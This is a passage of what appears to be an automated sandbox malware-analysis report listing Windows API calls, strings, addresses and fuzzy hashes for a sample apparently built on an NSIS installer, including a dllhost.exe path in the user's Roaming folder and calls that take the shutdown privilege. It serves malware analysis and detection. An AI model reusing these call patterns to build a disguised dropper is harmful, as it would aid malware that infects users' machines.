                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7570D4C4,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                              • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-4017390910
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Roaming,00402F2D,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B7F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405B69
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 2709904686-2707566632
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                              • CharNextA.USER32(00000000), ref: 00405CDC
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32 ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,00437800), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,00437800), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-3195845224
                                                                              • Opcode ID: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: f6fbf25430e21501bb68e7fd8701bad57b8adefdd86ce7047aeb7cb0d2a7cc6d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: c06a76122a38eed4d9117e44778157b81fdc71c1f1957922822c2912a25a1923
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: c06a76122a38eed4d9117e44778157b81fdc71c1f1957922822c2912a25a1923
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,?,00437800,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: \*.*
                                                                              • API String ID: 2035342205-1173974218
                                                                              • Opcode ID: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: 605fd81be1f41f38ce9b100556876732106d54cf1fc53f7772c9c8b4b7d1963f
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,7570D4C4,0040597A,?,00437800,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: {$6B
                                                                              • API String ID: 590372296-3705917127
                                                                              • Opcode ID: 966f380b203b7feeda30c505118a47af216d833df9063fc1c555560a32d87caa
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 966f380b203b7feeda30c505118a47af216d833df9063fc1c555560a32d87caa
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • EnableWindow.USER32(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                              • String ID: 6B
                                                                              • API String ID: 184305955-4127139157
                                                                              • Opcode ID: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: a4db143bb65d0e391743e1b67bf87524629fdee33245fd25fce41cee6e60d782
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,7570D4C4,00435000,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(004281A0), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-949986762
                                                                              • Opcode ID: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: de1469bc4878199ea01b60fec97fd66d0310a25772ab1ef6440d8c2ceb6dcd7b
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000045C000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.000000000046F000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884306783.00000000004A3000.00000002.00000001.01000000.0000000D.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_33_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: N
                                                                              • API String ID: 3103080414-1130791706
                                                                              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000021.00000002.884282737.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000021.00000002.884275350.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884290645.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                              • Associated: 00000021.00000002.884298078.000000000040A000.00000008.00000001.01000000.0000000D.sdmp
